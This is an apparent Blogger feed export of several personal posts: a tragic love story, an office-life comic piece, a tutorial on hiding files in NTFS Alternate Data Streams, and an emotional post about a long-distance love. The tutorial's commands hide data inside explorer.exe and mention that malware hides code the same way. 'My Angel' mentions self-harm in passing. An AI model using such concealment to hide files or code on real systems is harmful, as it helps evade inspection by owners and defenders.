scooter. My apprehensions abound. I can’t make out whether she is sympathisizing with me or likes to pull my leg. Whatever the case, she is one reason why I still work in hell. 
She comes, we clean up the mess that the devil just made and she promises me for coffee at 1:00 and scampers away. I finish all the files well before 1 and the entire day I act busy, just to avoid his Highness. Sabrina and me have lunch and then she comes and goes every fifteen minutes or so into my cabin till 7:00 and then the boss drops her home and I try starting my scooter till 8:00 and by the time I reach home, I forget what time it is.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Sabrina and I have been working together for over a year now. I never had the courage to tell her that I love her more than anything that could have ever existed. Thought it would ruin our friendship, but hey, they always say, no pain no gain. Many a times I gathered enough courage to stand in front of her, look into her deep black eyes and tell her “I Love…” and then my confidence would buckle under the weight of consequences and I would end up saying something stupid like “I Love… to play football, why don’t you join me?” She would always laugh; I would give anything to see her million dollar smile. She always concluded the interaction by saying “Grow up Ranvir!”. And something told me deep inside that she loved me…..&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Sabrina didn’t have a father. Her maternal uncle was everything to her. Mr. Dias had died when Sabrina was doing her final year in Commerce. She was the only daughter in the family and Mrs. Dias had succumbed to childbirth. She wasn’t rich but yes, she could have bought 10 of my scooters this afternoon itself! Sabrina had invited me several times to her house, but I never had the time, it was an excuse that my sub conscious mind would definitely be happy to give. In fact I did not have the courage to go to her house and meet her uncle. 
I knew where she stayed though, precise directions and a road map; she had taken an entire afternoon explaining me the shortest way from my house and from the office.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;It was a Thursday, and as usual I was in my cabin working under files and papers. Sabrina came around just to make sure I was still breathing and ran her fingers through my hair. She informed me that Ranaut was leaving and she had to go along, he had to discuss some points for tomorrows meeting with her. It was the usual reason that he gave her and which she gave me. I saw them leave and then 10 minutes later I left. The clouds had gathered overhead and I knew it would pour any minute now. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I reached Delnaz Lane, on the way to my house when it started raining. I parked (threw would be a better word) my scooter next to a flower shop and knew only god would be able to start it now. I had never stopped here in my life and I knew this place was special because Sabrina’s violin classes were on the second floor of the yellow building right in front of me. I still had the map in my pocket; intuition told me to have a look. My heart started beating faster, if my sense of geography was correct, I was standing just two blocks away from Sabrina’s house!! The man in me finally wanting to run and embrace her. The adrenalin rush was just too much to handle, my legs started carrying me towards her house. It was 9 in my watch.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;She lived on the ground floor of Diaspora Apartments, a pink building that rose 5 storey high. I reached the front door, the sign unmistakably reading Mr. Denver Gonzalez, her uncle. It was pouring more heavily now. I gathered all the strength in me, this was the point of no return, I gave the bell a solid ring. 
Felt sick in the stomach, wanted to run, but vanishing courage gave a final push and I rang the bell again. No response. I rang the bell again. Still no response. The suspense was unnerving. It was 9.10, she never slept this early, never. Where was she?? My heart skipped a beat, unfaithful thoughts coming to my head, she was last seen with the jackal and he never made his intentions clear. The clouds were clearing and I assumed she was out on dinner with her uncle. I left.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I reached home at 11.00 in the night, clothes shoddily wet and scooter in hand. I couldn’t sleep that night. For the first time in my life I had gathered enough courage to walk up to her house and ring the bell and she wasn’t there to open it. I cursed my luck.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The phone rang in the morning, when I was leaving. They asked for me, Sabrina had met with an accident, a bus had rammed into her the previous night, she was on a respirator and had lost lot of blood. They said every second she was growing weaker and she had repeatedly called out his name the previous night. They had found his number in her diary. I stood transfixed. My mom shook me out of stupor and I gathered my senses and I ran, I ran like I have never run in my life. Tears wetting my cheeks all along. Exhausted and with burning lungs, I searched for the Intensive Care Unit.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I cursed myself for letting her go that day with Ranaut, I didn't care if he was alive or dead. Mr. Gonzalez said she was hit by the bus when she was crossing the road after ordering flowers from the Florist at Delnaz Lane for some guy named Ranvir, it was his birthday the next day. My eyes were fixed onto her body when they lowered it down into her grave, where she would rest to eternity. 
She was still wearing black…..&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-7302727065338950389?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/7302727065338950389/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/10/one-rainy-day.html#comment-form' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7302727065338950389'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7302727065338950389'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/10/one-rainy-day.html' title='One Rainy Day'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-2895495741051449371</id><published>2009-09-10T21:13:00.000-07:00</published><updated>2009-09-10T21:37:26.698-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='irony'/><category scheme='http://www.blogger.com/atom/ns#' term='sarcasm'/><category scheme='http://www.blogger.com/atom/ns#' term='life'/><category scheme='http://www.blogger.com/atom/ns#' term='office life'/><category scheme='http://www.blogger.com/atom/ns#' term='prices'/><category scheme='http://www.blogger.com/atom/ns#' term='dream'/><category scheme='http://www.blogger.com/atom/ns#' term='inflation'/><category 
scheme='http://www.blogger.com/atom/ns#' term='Humor'/><title type='text'>Once Upon a Thursday..</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;span style="font-family: trebuchet ms;"&gt;Mr. Siva Rao lives somewhere in Jayanagar with his one wife and two sons, the eldest of who is yet to appear for his PUC examinations after his two failed attempts. Known to people as Mr. Siva Rao, although his birth certificate identifies him as Vijayawada Sitaramanjaneyula Rajasekhara Yarlagadda Venkata Samba Siva Rao, he is one man who could over react for even the tiniest murmur of thunder in the sky. Known for his shrill audible voice and chalk white &lt;span style="font-style: italic;"&gt;lungi&lt;/span&gt; that he keeps folding up his waist, Mr. Siva Rao threatens kids, dogs and bikers alike around his locality. He travels to office everyday on his new CBZ, thank heavens he wears pants then.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;It was a beautiful Thursday morning. I was still lazing in bed when I heard Mr. Siva Rao yelling on top of his voice. I could also hear the soft spoken voice of Mrs. Rao coming out through their kitchen window. &lt;span style="font-style: italic;"&gt;"How am I supposed to cook? I have been telling you to get the cylinder before this one gets over? Don't tell me I did not warn you?"&lt;/span&gt; I could vaguely imagine Mrs. Rao, a short beautiful woman in her mid 40s, pointing her stubby fingers at the now worthless piece of metal. Mr. Rao then proceeded to say something in his native tongue, which fortunately I didn't understand, but he sounded angry. Then abruptly there was silence. I wondered whether a peace treaty had been signed or Mrs. Rao was now no more. I sat upright in my bed, stretching myself. I looked out of my window again to see signs of any movement. 
Their kitchen window was locked; I assumed there wouldn’t be any more verbal ranting so I slipped out of bed to begin my day.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I went through the morning routine methodically to prevent any wastage of water or electricity which the caretaker of our PG house constantly reminds us of. I ironed my clothes, wore my shoes and stepped out wearing a smile that could give Mona Lisa a run for money.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I first thought it was funny to see 4 men on a bike next to the signal where I usually wait for the bus to arrive, but then I realized, it was the same scene everywhere! Cars were carrying 7-8 people, bikes were loaded with 3-4 people and buses were overflowing! I rubbed my eyes to swallow what I could see. There was less traffic on the road though, even at this peak hour. I was nonchalant and assumed it to be just casual traffic police maneuvers. I skipped 6 buses due to the sudden increase in commuters. The doors would not close, I couldn’t see the driver and the windows were all covered with bums of different sizes. Weird I thought. Looked like as if half of China had invaded India, although, I dint see any Mongoloids amongst the crowd. I was running out of time and knew I would get late for my Annual Performance Review meeting with my Manager. I prayed in silent tears.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;Somebody on a bike with a pillion rider stopped in front of me. I was happy to see that there were only two people on the bike. The rider pulled off his helmet and then I recognized Mr. Siva Rao. The pillion rider identified himself as Mr. Shetty, Engineer at another Software company down on Outer Ring Road. Mr. Siva Rao spoke hesitantly with his usual deep accented Tamil accent, &lt;span style="font-style: italic;"&gt;"So you waiting for bus? No bus. No bus. Mr. 
Shetty here waiting for bus since 8.00 AM in the morning. All crowded. You come, I drop you to office. On way to Marathalli right. Sit sit."&lt;/span&gt; I couldn't refuse but I couldn't stop myself from asking, &lt;span style="font-style: italic;"&gt;"Eh.. Mr. Rao… won't the police fine us for riding three on a bike?"&lt;/span&gt; Mr. Siva Rao smiled showing his misshapen canines. &lt;span style="font-style: italic;"&gt;"Police no say anything. People taking lifts and using buses to reach office. Less traffic faster to reach office less petrol you see."&lt;/span&gt; I could see the end of the tunnel from where all insanity of the public was coming from. I shrugged, squeezed between Mr. Siva Rao and Mr. Shetty and closed my eyes for the rest of the journey.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;Mr. Siva Rao dropped me at the closest signal to my office and scampered on with Mr. Shetty although in the distance I could see him wait and pick up another hapless stranded soul on the Ring Road. I brushed off the creases on my shirt and crossed the road. Several people were on foot today. I saw my colleague Ritesh** entering the gates as I walked up to him. &lt;span style="font-style: italic;"&gt;"No bike today huh?"&lt;/span&gt; He responded with a cold shrug and stared stone faced to the building entrance. &lt;span style="font-style: italic;"&gt;"A walk a day keeps the doctor away!"&lt;/span&gt; I shook my head; I had heard wittier words than those from him.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;My day at the office was normal, with just a few bumps here and there. Lunch was something I was looking forward to. Precisely at 2:00, I locked my workstation and proceeded down towards the cafeteria. Several employees were standing at the entrance talking in hushed tones. I saw several of my friends in the lot too. I walked up to them. 
&lt;span style="font-style: italic;"&gt;"Wassup people? Why is everybody out here?"&lt;/span&gt; Raees** whisked me out of the crowd and pointed steadfast at a small notice that had been put up at the counter. I carefully read and re-read the posting. I now knew why people appeared scared and why Raees and the others were tensed as if their exam results were to be declared that afternoon.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I walked down towards the lonely mess that is visited by a handful of people down the road outside the campus wondering aloud; &lt;span style="font-style: italic;"&gt;"70 bucks for that food?? That's more then a 50 percent hike in prices. God what else?"&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I had never been to a mess before, but what I had heard from the others, the food was good and cheap and this place was hardly visited by anybody. I reached the place following crudely drawn directions given to me by another of my colleague, Guru**. I couldn’t recognize the place though because it had been described by people as a deserted waste of space. There were atleast 30 people in there and several standing in a queue outside!! I saw a familiar face in the queue, I didn't know his name but he was from the same floor that I worked on. I waved to him and casually walked up to where he was standing. Assuming it was unbeknownst to the others, I slowly moved my feet, inch by inch in to the queue. As soon as my feet were inside I proceeded to shift the rest of my body in to the line, discussing mundane topics like the elections, Harry Potter and Carmen Electra with my new found friend to throw him and the others off the track. But alas I forgot there were several seasoned players in this game already in the queue. 
I soon found myself whisked at the end of the line by several pairs of black strong hands that looked and smelt of tar.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I returned to my lab an hour and half later having had the tastiest food that I had eaten in months. I then proceeded to complete my work. Precisely at 6:00, I fired off the mails that I had kept pending for the past few days. Forwarded some nasty office jokes to my friends, locked the workstation and walked down the stairs to begin my journey back to my room.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;My afternoon had passed off peacefully and the morning just seemed so far away. As I walked out of the gate, reality slapped me so hard, my eyes watered. There was less traffic no doubt. But the scenario had not improved a tad. There were people on bikes, cars were loaded. I saw several engineers (by the looks of them and the laptop bags they carried) on the top of three trucks, smiling and waving out to people as if they were campaigning for elections!! I vaguely remembered Swades. I flicked out my new Sony Ericcson Z555i with Gesture Control 2 MP camera phone and randomly clicked some pictures. Down the 8th picture, my phone started ringing. Some unknown number, I hoped it wasn’t some bank wanting to give me a personal loan or credit card or something. The excited voice on the other end was familiar. &lt;span style="font-style: italic;"&gt;"Look behind, look behind, behind the red truck, between the bus and the truck… look look…"&lt;/span&gt; I turned around to see Mr. Siva Rao flailing his hands as if he had just seen Sachin Tendulkar. I walked up to him and smiled. He looked small without his helmet on. Unbelievably he was alone. 
I did not question him but clambered on to the bike to get home.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;I slept peacefully that night dreaming about me discovering an oil well in the background of my PG house, becoming rich overnight and marrying Katrina Kaif. The first thing I did with the money in my dreams was to buy a bicycle. Thanking God they didn't run on petrol.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: trebuchet ms;"&gt;** Names changed to protect privacy.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-2895495741051449371?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/2895495741051449371/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/09/once-upon-thursday.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/2895495741051449371'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/2895495741051449371'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/09/once-upon-thursday.html' title='Once Upon a Thursday..'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' 
src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-8668768331682566692</id><published>2009-09-02T02:08:00.000-07:00</published><updated>2009-09-04T02:14:10.133-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NTFS ADS'/><category scheme='http://www.blogger.com/atom/ns#' term='data hiding'/><category scheme='http://www.blogger.com/atom/ns#' term='NTStream'/><category scheme='http://www.blogger.com/atom/ns#' term='Backup APIs'/><title type='text'>NTFS Alternate Data Streams</title><content type='html'>&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The NTFS file system was a remarkable creation for the world of Windows. Windows NT systems have proven their local security largely on the basis of the NTFS file system. It included several new features: quotas, sparse file support, reparse points, distributed link tracking and the Encrypting File System (EFS). What I am going to describe here is not the file system itself, but a little known property of NTFS called ADS. ADS does not stand for Active Directory Services or Asynchronous Digital Systems or Another Dead Soul or anything that whacky. ADS or Alternate Data Stream is any data attached to another file but not within the file itself. Windows implements many of its little known functions like additional file information and tagging files as encrypted using ADS.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;One of the most common uses of ADS has to store additional file information like the Authors name, Word count, Pages and other document data of a word file. You can view and edit this information by right clicking a word document &gt;&gt; properties and clicking on the summary tab. 
In fact any file will have a summary tab on an NTFS drive so that you can indirectly edit the ADS of that particular file. A file without any custom information added, contains a single data stream called $DATA which is the data inside the file itself and is not an alternate data stream. Any other streams attached to it will have the format filename.extension:ADSname:$data. When you open a normal file the default $DATA is read which is the data in the file itself. A normal file will be of the format filename.extension::$Data (Note there is no ADS). Imagine you had a text file full of passwords and you had attached it to explorer.exe, then to access the contents of passwords.txt file you would have to use explorer.exe:passwords.txt:$Data. You can even have ADS for a folder!! In fact any folder on a NTFS system. You could then store your passwords.txt file attached to C:\Windows!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;You can attach any number of files to any single file or folder. That means you could attach a 699 MB DvDrip AVI to a 4 MB Summer of 69.mp3 without increasing the size of your mp3 by a single byte!! Windows does not show the attached file in explorer or by any normal means. The whole 699 MB can be stored on to the hard disk (without anybody knowing) and retrieved later. Since ADS is not stored inside the parent file, the size of the mp3 remains the same!! Although disk space goes down by the same amount.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;That kinda sounds far fetched right? Alright lets have a small demonstration. 
Let's use explorer.exe and passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Open Notepad and type the following:    &lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;Orkut=h@ck3rz&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;Rediff=r3dm0nd123&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;facebook=!@#c3sium&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;These are web services and their respective passwords. You could type in anything you want. Then save the file as passwords.txt in C: drive.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Then go to Start &gt;&gt; Run &gt;&gt; cmd to open the command prompt. cd.. your way to C:\&gt; then type the following:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;C:\&gt;type passwords.txt &gt; C:\Windows\explorer.exe:passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Delete the original passwords.txt file from C: drive. The above command is self explanatory but for all those who didn't grasp its entirety, here's how it works. The type command is a cmd internal command to display the contents of a file, so type [filename] will display the contents of the text file. The &gt;, also called the output redirection operator, is used to redirect output from one command to another command or file. C:\Windows\explorer.exe:passwords.txt is the ADS to explorer.exe called Passwords.txt. 
Now your file is hidden from casual browsing and since you have attached it to explorer.exe (highly unlikely to be deleted) you can sleep well. Hidden is not the same as protected though: the stream is stored as plain text, anyone who can read explorer.exe can read it, and stream listing tools (Sysinternals Streams, or dir /R on newer Windows) will show it, so don't use this for anything you would otherwise encrypt.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;To retrieve the text file or the data inside, you can again use the command prompt or notepad.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Using command prompt:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;C:\&gt;more &lt; &lt;/span&gt;&lt;/span&gt;    &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;C:\Windows\explorer.exe:passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;More is used to display output one screen at a time. Conveniently type does not work to display file contents here. The &lt;, also (you must have already guessed it) called the input redirection operator, takes the file contents from the file and gives it to more so it is displayed a (screen) page at a time. To dump it back to a text file use&lt;/span&gt;&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;C:\&gt;echo | more &lt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt; C:\Windows\explorer.exe:passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt; &gt; Passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;This is slightly complicated. Echo is used to display whatever is given to it as an argument. Echo Hello will display Hello. 
The pipe (|) is used to pass the output of the more command to echo and the &gt; is used to dump whatever got echoed to the text file Passwords.txt. Here is a simpler method.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;Using notepad:&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Go to Start &gt;&gt; Run and type the following.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;Notepad C:\Windows\Explorer.exe:Passwords.txt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;Notepad should open up displaying the contents of the file. You can then use File &gt;&gt; Save As to save it anywhere you want.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I went ahead and wrote a program that allows you to work with NTFS Alternate Data Streams (ADS) with ease. You can scan your whole hard disk for NTFS ADS, you can create, delete, modify and export streams easily. This application uses the native Windows API and hence is pretty fast at it. 
The application called NTStream is available &lt;/span&gt;&lt;a style="font-family: trebuchet ms;" href="http://riyazahemed.webng.com/winsystools/NTStream-Setup.zip"&gt; here&lt;/a&gt;&lt;/span&gt;.&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sp47M6SpLpI/AAAAAAAAARE/dW-VrM4imx8/s1600-h/Image1.PNG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 311px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/Sp47M6SpLpI/AAAAAAAAARE/dW-VrM4imx8/s400/Image1.PNG" alt="" id="BLOGGER_PHOTO_ID_5376800098118872722" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;font-family:verdana;font-size:85%;"  &gt;Ntstream&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;Since ADS is any data attached to another file, it will be deleted only if you delete the parent file or if you use a third party tool to delete it. Always remember the name of the data stream and the parent file to which you attached it. Creating data streams could take up valuable hard disk space (if you are planning to hide large files like movies etc.). You can use ADS to hide any type of data, even executable code. Although thats not a good administrative practice, it can be done. Viruses and worms like Email-Worm.Win32.Dumaru.a and Win2K.Stream use ADS to spread. 
Use ADS efficiently and non-maliciously, use it to your advantage.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-8668768331682566692?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/8668768331682566692/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/09/ntfs-alternate-data-streams.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/8668768331682566692'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/8668768331682566692'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/09/ntfs-alternate-data-streams.html' title='NTFS Alternate Data Streams'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_17JNeVdiZ7k/Sp47M6SpLpI/AAAAAAAAARE/dW-VrM4imx8/s72-c/Image1.PNG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-5542288483259434388</id><published>2009-08-23T03:49:00.000-07:00</published><updated>2009-08-23T04:07:57.136-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='angel'/><category scheme='http://www.blogger.com/atom/ns#' term='life'/><category scheme='http://www.blogger.com/atom/ns#' term='memories'/><category 
scheme='http://www.blogger.com/atom/ns#' term='love'/><title type='text'>My Angel</title><content type='html'>&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;She is a year younger to me. We have known each other for over 2 years now, but it seems like we have known each other for centuries. She’s absolutely normal, no complaints at all, like any other girl of her age, extra sensitive towards ideas that have nothing to do with her, mounting tension about studies and placements gripping her every weekend, a feeble smile when she is hurt and two huge tear drops in her eyes when I’m going back to work. With hair that keeps coming across her face whenever I try to stare into her deep black eyes. She pulls them back of course and I swear to God I forget where I am. Life seems complete when she puts her head on to my shoulders and goes to sleep. I feel like living a thousand years, just looking at her talk with constant nods of her head. Feel like pulling her into my arms when she yells that I wasn't listening to her. Life... Life is dragging me hopelessly... I don't know where...&lt;br /&gt;&lt;br /&gt;I was an evangelist, preaching how dangerous women are until I met her. She is the sweetest thing that has happened to me. We have exchanged promises, promises of staying together for now and forever, promises of laughing, playing, fighting, eating, walking, dancing, cooking and all the other things I once thought stupid. I cry in the night, when I go to sleep all alone 800 kms away from my sweetheart. 
Memories of the times we have spent together, the way she nods her head even when she hasn’t understood what I was telling her, her scolding when I would forget to take my medicines, the threatening messages when I dont call her back after she keeps the phone, the times spent in arguing over unimportant stuff, the things she said to me, the care that I take while speaking lest I hurt her, the "You eat first and tell me, then I'll eat" talks, the exam tips that she often took, the "I will love you forever", the numerous "miss you idiot" and they go on. Memories... Sweet memories are all what I have when I am this far, physically separated but emotionally still single. All our friends who know about us swear by our love, a single soul in two bodies, that's what they say. It's difficult to imagine life without her. We can't live without each other. It's difficult to even leave hands when we are getting down the bus!! Life is beautiful when we are together but yet I have to work here in desolation and solitude staring at my screen in the nostalgic company of her photographs. I think over what I have lost and what I have gained by coming here. It was a choice I had to take. Had to come here to earn, to have her. I know people say "money isn't everything", ask me I say. Was sworn by my family long before I had known her, had promised my folks back home to give them a life that they have always desired and then think about settling down in life. Give them all the luxury that my hardworking father never could provide. And all that within the next 3 years.&lt;br /&gt;&lt;br /&gt;But alas, God, I feel, doesn't wish to see us together, I am a mortal fighting to have my love with me for eternity. I cry every day, I pray for us, I hurt myself to subdue the pain within, yet the pain that increases with every single day I spend away from her, away from my little angel, yes I call her my angel, my sweet little angel, the pain never fades. 
The pain is horrible, it's like somebody is holding on to your dreams ready to leave them so that they fall and shatter and it is assumed that you will forget as winds of time sweep off the dust that remains. Forget her? God I could forget I have to breathe, but her? Why are you asking such a heavy price? I cannot fathom what will happen if I am forced to live without her. I have already lost my senses without her next to me here; it won’t be long before I lose myself completely. With parents who come from psychological backgrounds where falling in love is considered to be a violation of the rules of Mother Nature. Where it is thought upholding the honor and dignity of family traditions, rituals and fervor is more important then you being happy with a girl who means the world to you. Where it is thought the so called man made society will talk year after year about the boy who stood against his parents. Where it is thought that choices made by the elders is always right and it is assumed that you will lead a happy life with a complete stranger. Why did God make choices? Why can’t God make our parents understand? Why can’t God just leave us alone?&lt;br /&gt;&lt;br /&gt;Eyes reddened with tears, heart heavy and aching with her thoughts, sleepless with feelings that haunt me day and night, I live on. 
